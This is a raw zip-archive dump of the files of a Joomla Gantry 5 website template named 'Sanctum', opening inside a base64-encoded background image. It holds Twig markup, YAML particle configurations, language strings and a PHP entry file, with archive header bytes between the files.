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');
        padding: 1rem;
        background-repeat: no-repeat;
        background-size: cover;
        border-radius: 6px;
    }
</style>PK!�dCk��-it_sanctum/install/templates/update.html.twignu&1i�{% include 'style.html.twig' %}

<div class="g5i">
    <h1>
        <span class="g5-title">{{ name }} Template Updated</span>
        <span class="g5-info">v{{ version }} / {{ date }}</span>
    </h1>

    <div class="g5-actions">
        <a href="{{ edit_url }}" class="g5-button">Configure <span class="g5-icon icon-chevron-right"></span></a>
    </div>

    <div class="g5-rockettheme">
        <a href="http://www.inspiretheme.com"><span>InspireTheme</span></a>
    </div>
</div>PK!�[�8��.it_sanctum/install/templates/install.html.twignu&1i�{% include 'style.html.twig' %}

<div class="g5i">
    <h1>
        <span class="g5-title">{{ name }} Template Installed</span>
        <span class="g5-info">v{{ version }} / {{ date }}</span>
    </h1>

    <p>Select if you want to set the template as "Default" or if you want to go to the Template Manager and start configuring it.</p>

    <div class="g5-actions">
        <a href="{{ install_url }}" class="g5-button"><span class="g5-icon icon-cube"></span> Set as Default</a>
        <a href="{{ edit_url }}" class="g5-button">Configure <span class="g5-icon icon-chevron-right"></span></a>
    </div>
    
    <div class="g5-rockettheme">
        <a href="http://www.inspiretheme.com"><span>InspireTheme</span></a>
    </div>
</div>PK!��*k��2it_sanctum/language/en-GB/en-GB.tpl_it_sanctum.ininu&1i�IT_SANCTUM="Sanctum"
TPL_IT_SANCTUM_DESC="Sanctum template for Gantry 5 Framework"

GANTRY5_PARTICLE_MENU_INFO="Menu particle is designed to be used in <strong>Navigation</strong> and <strong>Top</strong> sections only. For your Main Menu, the <strong>Navigation</strong> section is recommended."

GANTRY5_THEME_INSTALL_GANTRY="Please install Gantry 5 Framework!"
GANTRY5_THEME_FRONTEND_SETTINGS_DISABLED="Template Settings page has been disabled: Feature is not supported for Gantry 5 templates."
GANTRY5_THEME_LOADING_FAILED="Failed to load '%s' template: %s"

GANTRY5_PLATFORM_SAMPLE_DATA_INSTALLED="Template was set as Default."
GANTRY5_INSTALLER_ACTIONS="Following actions were performed:"

INSPIRE_TAGS="TAGS: "PK!-��yy6it_sanctum/language/en-GB/en-GB.tpl_it_sanctum.sys.ininu&1i�IT_SANCTUM="Sanctum"
TPL_IT_SANCTUM_DESC="Sanctum template for Gantry 5 Framework"

GANTRY5_THEME_HOME_STYLE="%s - Home"
PK!S���it_sanctum/index.phpnu&1i�<?php
/**
 * @package   Gantry 5 Theme
 * @author    RocketTheme http://www.rockettheme.com
 * @copyright Copyright (C) 2007 - 2015 RocketTheme, LLC
 * @license   GNU/GPLv2 and later
 *
 * http://www.gnu.org/licenses/gpl-2.0.html
 */

defined('_JEXEC') or die;

// Bootstrap Gantry framework or fail gracefully (inside included file).
$gantry = include __DIR__ . '/includes/gantry.php';

/** @var \Gantry\Framework\Theme $theme */
$theme = $gantry['theme'];

/** @var \Gantry\Framework\Outlines $configurations */
$configurations = $gantry['configurations'];

// All the custom twig variables can be defined in here:
$context = array();

// Render the page.
echo $theme
    ->setLayout($configurations->current())
    ->render('index.html.twig', $context);PK!��?M��'it_sanctum/particles/contacts.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% set attr_extra = '' %}
{% if particle.extra %}
    {% for attributes in particle.extra %}
        {% for key, value in attributes %}
            {% set attr_extra = attr_extra ~ ' ' ~ key|e ~ '="' ~ value|e('html_attr') ~ '"' %}
        {% endfor %}
    {% endfor %}
{% endif %}

{% set contactitems %}
    {% for item in particle.items %}
        {% set attr_extra_item = '' %}
        {% for extra in item.extra %}
            {% set attr_extra_item = attr_extra_item ~ ' ' ~ extra|keys|first|e ~ '="' ~ extra|values|first|e('html_attr') ~ '"' %}
        {% endfor %}

        {% set style1 %}
            <div class="g-contacts-item{% if item.class %} {{ item.class|e }}{% endif %}{% if particle.layout|default('vertical') == 'horizontal' and particle.equal|default(0) %} g-block{% endif %}" {% if item.extra %}{{ attr_extra_item|raw }}{% endif %}>
                {% if particle.layout|default('vertical') == 'horizontal' and particle.equal|default(0) %}
                    <div class="g-content">
                {% endif %}

                {% if item.link %}
                    <a target="{{ item.target|default('_parent')|e }}" href="{{ item.link|e }}">
                {% endif %}

                {% if item.icon %}
                    <span class="g-contacts-icon {{ item.icon|e }}"></span>
                {% endif %}

                {% if item.title %}
                    <span class="g-contact-title">{{ item.title|raw }}</span>
                {% endif %}

                {% if item.value %}
                    <span class="g-contact-value">{{ item.value|raw }}</span>
                {% endif %}
                    
                {% if item.link %}
                    </a>
                {% endif %}

                {% if particle.layout|default('vertical') == 'horizontal' and particle.equal|default(0) %}
                    </div>
                {% endif %}
            </div>
        {% endset %}

        {% set style2 %}
            <div class="g-contacts-item{% if item.class %} {{ item.class|e }}{% endif %}{% if particle.layout|default('vertical') == 'horizontal' and particle.equal|default(0) %} g-block{% endif %}" {% if item.extra %}{{ attr_extra_item|raw }}{% endif %}>
                {% if particle.layout|default('vertical') == 'horizontal' and particle.equal|default(0) %}
                    <div class="g-content">
                {% endif %}

                {% if item.icon %}
                    <div class="g-contacts-icon">
                        <span class="{{ item.icon|e }}"></span>
                    </div>
                {% endif %}

                {% if item.title or item.value%}
                    <div class="g-title-value-container">
                        {% if item.title %}
                            <h4 class="g-contact-title">
                                {{- item.title|raw -}}
                            </h4>
                        {% endif %}

                        {% if item.value %}
                            <div class="g-contact-value">
                                {%- if item.link -%}
                                    <a target="{{ item.target|default('_parent')|e }}" href="{{ item.link|e }}">
                                {%- endif -%}
                                {{- item.value|raw -}}
                                {%- if item.link -%}
                                    </a>
                                {%- endif -%}
                            </div>
                        {% endif %}
                    </div>
                {% endif %}

                {% if particle.layout|default('vertical') == 'horizontal' and particle.equal|default(0) %}
                    </div>
                {% endif %}
            </div>
        {% endset %}

        {% if particle.style|default("style1") == "style1" %}{{ style1 }}{% endif %}
        {% if particle.style|default("style1") == "style2" %}{{ style2 }}{% endif %}

    {% endfor %}
{% endset %}

{% block particle %}
    <div class="g-contacts {{ particle.style|default("style1")|e }} {{ particle.layout|default("vertical")|e }}{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
        {% if particle.layout|default('vertical') == 'horizontal' and particle.equal|default(0) %}
            <div class="g-grid">
        {% endif %}
            {{ contactitems }}
        {% if particle.layout|default('vertical') == 'horizontal' and particle.equal|default(0) %}
            </div>
        {% endif %}
    </div>
{% endblock %}PK!ۓ����&it_sanctum/particles/modal-search.yamlnu&1i�name: Modal Search
description: Display modal search.
type: particle

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable spacer.
      default: true

    _note:
      type: separator.note
      class: alert alert-info
      content: '<strong>This Particle requires the "UIkit for Gantry5" Atom to be loaded.</strong><br /><br />Displays modal search in your layout.<br />This particle is designed to be used in the Menu only.<br /><br /><strong>Joomla:</strong> Go to the Module Manager and make sure your Search module is published in the "<strong>modal-search</strong>" position.<br /><br /><strong>Grav CMS:</strong> Make sure you have installed the <a href="https://github.com/getgrav/grav-plugin-simplesearch" target="_blank"><strong>SimpleSearch</strong></a> plugin.'

    style:
      type: select.select
      label: Style
      description: Select the style which defines the particle layout on the frontend.
      placeholder: 'Select...'
      default: style1
      options:
        style1: Style 1
        style2: Style 2PK!�(����(it_sanctum/particles/image-features.yamlnu&1i�name: Image Features
description: Display image features.
type: particle

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable Image Features particles.
      default: true

    _note:
      type: separator.note
      class: alert alert-info
      content: '<strong>This Particle requires the "UIkit for Gantry5" Atom to be loaded.</strong>'

    mainheading:
      type: input.text
      label: Title
      description: Type in the title.
      placeholder: 'Enter Title'
      default: ''

    introtext:
      type: textarea.textarea
      label: Intro Text
      description: Type in the intro text.
      placeholder: 'Enter Intro Text'
      default: ''

    columns:
      type: select.select
      label: Items per Row
      description: Select the number of items per row.
      placeholder: 'Select...'
      default: 2
      options:
        1: 1
        2: 2
        3: 3
        4: 4
        5: 5

    css.class:
      type: input.selectize
      label: CSS Classes
      description: CSS class name for the particle.
      default: 

    extra:
      type: collection.keyvalue
      label: Tag Attributes
      description: Extra Tag attributes.
      key_placeholder: Key (data-*, style, ...)
      value_placeholder: Value
      exclude: ['id', 'class']

    items:
      type: collection.list
      array: true
      label: Image Features Items
      description: Create each image feature item to display.
      value: name
      ajax: true

      fields:

        .layout:
          type: select.select
          label: Layout
          description: Select the layout for this item.
          placeholder: 'Select...'
          default: left
          options:
            left: Image on the left
            right: Image on the right

        .image:
          type: input.imagepicker
          label: Image
          description: Select the image to display. For best results use a square image, for example 450x450.

        .imagewidth:
          type: input.text
          label: Image Width
          description: Type in the width of the image block in percentage. It must be a digit between 0 and 100. The default is '33'.
          default: 33

        .alt:
          type: input.text
          label: Image Alt Tag

        .title:
          type: input.text
          label: Title

        .link:
          type: input.text
          label: Title Link

        .target:
          type: select.select
          label: Target
          description: Target browser window when item is clicked.
          placeholder: 'Select...'
          default: _parent
          options:
            _parent: Self
            _blank: New Window

        .description:
          type: textarea.textarea
          label: Description

        .specialtext:
          type: input.text
          label: Special Text

        .icon:
          type: input.icon
          label: Special Icon
          description: Choose an icon to be placed in front of 'Special Text'.

        .bottomlink:
          type: input.text
          label: Bottom Link
          description: Enter the clickable text you want to be shown. The link is the URL you enter in the 'Title Link' field above.

        .class:
          type: input.selectize
          label: CSS Class

        .extra:
          type: collection.keyvalue
          label: Tag Attributes
          description: Extra Tag attributes.
          key_placeholder: Key (data-*, style, ...)
          value_placeholder: Value
          exclude: ['id', 'class']PK!Y�ij,,*it_sanctum/particles/offcanvas-toggle.yamlnu&1i�name: Offcanvas Toggle
description: Display Offcanvas Toggle button.
type: particle

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable Offcanvas Toggle particles.
      default: true

    _note:
      type: separator.note
      class: alert alert-info
      content: 'Displays the Offcanvas Toggle Button.<br />This particle is designed to be used in the Menu only.<br /><br />Once you publish this particle, it hides the original toggle button for the viewport size specified under "Styles" tab -> "Breakpoints" -> "Mobile Menu".'

    icon:
      type: input.icon
      label: Icon
      description: Select the icon for the Offcanvas Toggle button.
      default: 'fa fa-bars'
PK!)�y�	�	(it_sanctum/particles/accordion.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% set attr_extra = '' %}
{% if particle.extra %}
    {% for attributes in particle.extra %}
        {% for key, value in attributes %}
            {% set attr_extra = attr_extra ~ ' ' ~ key|e ~ '="' ~ value|e('html_attr') ~ '"' %}
        {% endfor %}
    {% endfor %}
{% endif %}

{% block stylesheets %}
    {% if particle.enabled %}
        {{ parent() }}
        <style type="text/css">
            .uk-accordion {display: block !important;}
        </style>
    {% endif %}
{% endblock %}

{% set particleheading %}
    <div class="g-particle-intro">
        {% if particle.mainheading %}
            <h3 class="g-title g-main-title">{{ particle.mainheading|raw }}</h3>
            <div class="g-title-separator {% if particle.introtext == false %}no-intro-text{% endif %}"></div>
        {% endif %} 
        {% if particle.introtext %}<p class="g-introtext">{{ particle.introtext|raw }}</p>{% endif %}
    </div>
{% endset %}

{% block particle %}
    <div class="g-accordion{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
        {% if particle.mainheading or particle.introtext %}
            {{ particleheading }}
        {% endif %}
        
        <div class="uk-accordion" data-uk-accordion="{collapse: {{ particle.collapse|default("true")|e }}, showfirst: {{ particle.showfirst|default("true")|e }}}">
            {% for item in particle.items %}
                {% set attr_extra_item = '' %}
                {% for extra in item.extra %}
                    {% set attr_extra_item = attr_extra_item ~ ' ' ~ extra|keys|first|e ~ '="' ~ extra|values|first|e('html_attr') ~ '"' %}
                {% endfor %}
                <div class="g-accordion-item{% if item.class %} {{ item.class|e }}{% endif %}" {% if item.extra %}{{ attr_extra_item|raw }}{% endif %}>
                    {% if item.title %}
                        <h3 class="uk-accordion-title">
                            {{- item.title|raw -}}
                        </h3>
                    {% endif %}

                    {% if item.description %}
                        <div class="uk-accordion-content">
                            {{- gantry.platform.filter(item.description)|html|raw -}}
                        </div>
                    {% endif %}
                </div>
            {% endfor %}
        </div>
    </div>
{% endblock %}PK!<1
��	�	#it_sanctum/particles/accordion.yamlnu&1i�name: Accordion
description: Display an Accordion.
type: particle

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable Accordion particles.
      default: true

    _note:
      type: separator.note
      class: alert alert-info
      content: '<strong>This Particle requires the "UIkit for Gantry5" Atom to be loaded.</strong>'

    mainheading:
      type: input.text
      label: Title
      description: Type in the title.
      placeholder: 'Enter Title'
      default: ''

    introtext:
      type: textarea.textarea
      label: Intro Text
      description: Type in the intro text.
      placeholder: 'Enter Intro Text'
      default: ''

    collapse:
      type: select.select
      label: Collapse sections
      description: Display multiple content sections at the same time without one collapsing when the other one is opened.
      placeholder: 'Select...'
      default: "true"
      options:
        "true": Yes
        "false": No

    showfirst:
      type: select.select
      label: Show First
      description: Select if the first Accordion item should be opened by default.
      placeholder: 'Select...'
      default: "true"
      options:
        "true": Yes
        "false": No

    css.class:
      type: input.selectize
      label: CSS Classes
      description: CSS class name for the particle.
      default: 

    extra:
      type: collection.keyvalue
      label: Tag Attributes
      description: Extra Tag attributes.
      key_placeholder: Key (data-*, style, ...)
      value_placeholder: Value
      exclude: ['id', 'class']

    items:
      type: collection.list
      array: true
      label: Accordion Items
      description: Create each Accordion item to display.
      value: name
      ajax: true

      fields:

        .title:
          type: input.text
          label: Title

        .description:
          type: textarea.textarea
          label: Description

        .class:
          type: input.selectize
          label: CSS Class

        .extra:
          type: collection.keyvalue
          label: Tag Attributes
          description: Extra Tag attributes.
          key_placeholder: Key (data-*, style, ...)
          value_placeholder: Value
          exclude: ['id', 'class']PK!"*j;;$it_sanctum/particles/totop.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% block particle %}
{% assets in 'footer' with { priority: 10 } %}
	<script type="text/javascript">
		(function($) {
			$(document).ready(function() {
				$(window).scroll(function() {
					if ($(document).scrollTop() < {{ particle.offset|default(500)|e }} || $(window).width() < 767) {
				        $('#g-totop-button').removeClass('totopfixed');

				    } else {
				        $('#g-totop-button').addClass('totopfixed');

				    }
				});
			});
		})(jQuery);
	</script>
{% endassets -%}
<div class="{{ particle.css.class|e }} g-particle">
    <div class="g-totop {{ particle.style|default("style1")|e }}">
        <a href="#" id="g-totop-button" rel="nofollow" data-uk-smooth-scroll aria-label="{{'Back To Top'|trans_key('IT_ACCESS_TOTOP')}}">
            {% if particle.icon|default('fa fa-angle-up') %}<i class="{{particle.icon|default('fa fa-angle-up')|e}}"></i>{% endif %}
            {% if particle.content %}{{particle.content|raw}}{% endif %}
        </a>
    </div>
</div>
{% endblock %}
PK!�ț	�	"it_sanctum/particles/contacts.yamlnu&1i�name: Contacts
description: Display contacts.
type: particle

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable contacts particles.
      default: true

    style:
      type: select.select
      label: Style
      description: Select the style which defines the particle layout on the frontend.
      placeholder: 'Select...'
      default: style1
      options:
        style1: Style 1
        style2: Style 2

    layout:
      type: select.select
      label: Layout
      description: Select the the particle layout.
      placeholder: 'Select...'
      default: vertical
      options:
        vertical: Vertical
        horizontal: Horizontal

    equal:
      type: input.checkbox
      label: Equal Width
      description: Select if the contact items should be equal in width ('Horizontal' layout ONLY).
      default: 0

    css.class:
      type: input.selectize
      label: CSS Classes
      description: CSS class name for the particle.
      default: 

    extra:
      type: collection.keyvalue
      label: Tag Attributes
      description: Extra Tag attributes.
      key_placeholder: Key (data-*, style, ...)
      value_placeholder: Value
      exclude: ['id', 'class']

    items:
      type: collection.list
      array: true
      label: Contacts Items
      description: Create each contact item to display.
      value: name
      ajax: true

      fields:

        .icon:
          type: input.icon
          label: Icon

        .title:
          type: input.text
          label: Title

        .value:
          type: input.text
          label: Value

        .link:
          type: input.text
          label: Link

        .target:
          type: select.select
          label: Target
          description: Target browser window when item is clicked.
          placeholder: 'Select...'
          default: _parent
          options:
            _parent: Self
            _blank: New Window

        .class:
          type: input.selectize
          label: CSS Class

        .extra:
          type: collection.keyvalue
          label: Tag Attributes
          description: Extra Tag attributes.
          key_placeholder: Key (data-*, style, ...)
          value_placeholder: Value
          exclude: ['id', 'class']PK!�S����%it_sanctum/particles/template-js.yamlnu&1i�name: Template.js
description: Configure Template.js.
type: atom

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable Template.js particles.
      default: true

    _note:
      type: separator.note
      class: alert alert-info
      content: 'This Atom loads the template specific JavaScript code.<br />You <strong>MUST</strong> have this Atom loaded in your "Base" outline.'PK!��z���'it_sanctum/particles/paypal-donate.yamlnu&1i�name: PayPal Donate
description: Display a PayPal Donate button.
type: particle

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable PayPal Donate particles.
      default: true

    mainheading:
      type: input.text
      label: Title
      description: Type in the title.
      placeholder: 'Enter Title'
      default: ''

    introtext:
      type: textarea.textarea
      label: Intro Text
      description: Type in the intro text.
      placeholder: 'Enter Intro Text'
      default: ''

    email:
      type: input.text
      label: Email
      description: Type in the email on which you will receive donations.

    itemname:
      type: input.text
      label: Contribution Name
      description: Type in the contribution name/ organization.
      placeholder: Enter Name

    itemnumber:
      type: input.text
      label: Campaign Name
      description: Type in the campaign name.
      placeholder: Enter Campaign

    currencycode:
      type: input.text
      label: Currency Code
      description: Type in the currency code - use capital letters only!
      placeholder: USD

    buttontext:
      type: input.text
      label: Button Text
      description: Type in the button text.

    buttonicon:
      type: input.icon
      label: Button Icon
      description: Select an icon for the button.

    target:
      type: select.select
      label: Target
      description: Target browser window when item is clicked.
      placeholder: 'Select...'
      default: _blank
      options:
          _parent: Self
          _blank: New Window

    css.class:
      type: input.selectize
      label: CSS Classes
      description: CSS class name for the particle.
      default: 

    extra:
      type: collection.keyvalue
      label: Tag Attributes
      description: Extra Tag attributes.
      key_placeholder: Key (data-*, style, ...)
      value_placeholder: Value
      exclude: ['id', 'class']PK!���!!$it_sanctum/particles/cta-button.yamlnu&1i�name: CTA Button
description: Display a Call-to-action button.
type: particle

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable Call-to-action particles.
      default: true

    style:
      type: select.select
      label: Style
      description: Select the style which defines the particle layout on the frontend.
      placeholder: 'Select...'
      default: style1
      options:
        style1: Style 1
        style2: Style 2

    title:
      type: input.text
      label: Title
      description: Type in the title text.
      placeholder: Enter title

    description:
      type: textarea.textarea
      label: Description
      description: Type in the description text.
      placeholder: Enter description

    link:
      type: input.text
      label: Button Link
      description: Type in the URL.

    buttontext:
      type: input.text
      label: Button Text
      description: Type in the button text.

    buttonicon:
      type: input.icon
      label: Button Icon
      description: Select an icon for the button.

    target:
      type: select.select
      label: Target
      description: Target browser window when item is clicked.
      placeholder: 'Select...'
      default: _parent
      options:
          _parent: Self
          _blank: New Window

    css.class:
      type: input.selectize
      label: CSS Classes
      description: CSS class name for the particle.
      default: 

    extra:
      type: collection.keyvalue
      label: Tag Attributes
      description: Extra Tag attributes.
      key_placeholder: Key (data-*, style, ...)
      value_placeholder: Value
      exclude: ['id', 'class']PK!��^���#it_sanctum/particles/media-box.yamlnu&1i�name: Media Box
description: Display different file formats.
type: particle

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable Media Box particles.
      default: true

    _note:
      type: separator.note
      class: alert alert-info
      content: '<strong>This Particle requires the "UIkit for Gantry5" Atom to be loaded.</strong>'

    mainheading:
      type: input.text
      label: Title
      description: Type in the title.
      placeholder: 'Enter Title'
      default: ''

    introtext:
      type: textarea.textarea
      label: Intro Text
      description: Type in the intro text.
      placeholder: 'Enter Intro Text'
      default: ''

    tooltippos:
      type: select.select
      label: Tooltip Position
      description: Select the tooltip position.
      placeholder: 'Select...'
      default: top
      options:
        top: Top
        bottom: Bottom

    columns:
      type: select.select
      label: Items per row
      description: Select the number of items per row.
      placeholder: 'Select...'
      default: 1
      options:
        1: 1
        2: 2
        3: 3
        4: 4

    css.class:
      type: input.selectize
      label: CSS Classes
      description: CSS class name for the particle.
      default: 

    extra:
      type: collection.keyvalue
      label: Tag Attributes
      description: Extra Tag attributes for the particle.
      key_placeholder: Key (data-*, style, ...)
      value_placeholder: Value
      exclude: ['id', 'class']

    items:
      type: collection.list
      array: true
      label: Media Box items
      description: Create each media box item.
      value: name
      ajax: true

      fields:

        .title:
          type: input.text
          label: Title

        .titlelink:
          type: input.text
          label: Title Link

        .titletarget:
          type: select.select
          label: Target
          description: Target browser window when item is clicked.
          placeholder: 'Select...'
          default: _parent
          options:
           _parent: Self
           _blank: New Window

        .image:
          type: input.imagepicker
          label: Image
          description: Select the image to display.

        .alt:
          type: input.text
          label: Image Alt Tag

        .description:
          type: textarea.textarea
          label: Description

        .special1:
          type: input.text
          label: Special Text 1

        .special2:
          type: input.text
          label: Special Text 2

        .special2text:
          type: input.text
          label: Special 2 Link Title

        .special2link:
          type: input.text
          label: Link

        .target:
          type: select.select
          label: Target
          description: Target browser window when item is clicked.
          placeholder: 'Select...'
          default: _parent
          options:
           _parent: Self
           _blank: New Window

        _note:
          type: separator.note
          class: alert alert-info
          content: '<i class="fa fa-angle-down"></i> 1. Set Audio settings'

        .audio:
          type: input.filepicker
          label: Select Audio File

        .format:
          type: select.select
          label: Select audio format
          placeholder: 'Select...'
          default: mpeg
          options:
           mpeg: MPEG/ MP3
           ogg: OGG
           wave: Wave

        .buttonicon1:
          type: input.icon
          label: Icon

        .tooltip1:
          type: input.text
          label: Tooltip Text

        _note2:
          type: separator.note
          class: alert alert-info
          content: '<i class="fa fa-angle-down"></i> 2. Set Video settings'

        .video:
          type: input.text
          label: Video URL
          description: Paste the video URL.

        .buttonicon2:
          type: input.icon
          label: Icon

        .tooltip2:
          type: input.text
          label: Tooltip Text

        _note3:
          type: separator.note
          class: alert alert-info
          content: '<i class="fa fa-angle-down"></i> 3. Set Link 1 settings'

        .readfile:
          type: input.text
          label: Link

        .target3:
          type: select.select
          label: Target
          description: Target browser window when item is clicked.
          placeholder: 'Select...'
          default: _parent
          options:
           _parent: Self
           _blank: New Window

        .buttonicon3:
          type: input.icon
          label: Icon

        .tooltip3:
          type: input.text
          label: Tooltip Text

        _note4:
          type: separator.note
          class: alert alert-info
          content: '<i class="fa fa-angle-down"></i> 4. Set Link 2 settings (Recommended for downloadable items)'

        .readfile2:
          type: input.text
          label: Link

        .target4:
          type: select.select
          label: Target
          description: Target browser window when item is clicked.
          placeholder: 'Select...'
          default: _parent
          options:
           _parent: Self
           _blank: New Window

        .buttonicon4:
          type: input.icon
          label: Icon

        .tooltip4:
          type: input.text
          label: Tooltip Text

        _note5:
          type: separator.note
          class: alert alert-info
          content: '<i class="fa fa-angle-down"></i> 5. Set Link 3 settings'

        .readmore:
          type: input.text
          label: Link

        .target5:
          type: select.select
          label: Target
          description: Target browser window when item is clicked.
          placeholder: 'Select...'
          default: _parent
          options:
           _parent: Self
           _blank: New Window

        .buttonicon5:
          type: input.icon
          label: Icon

        .tooltip5:
          type: input.text
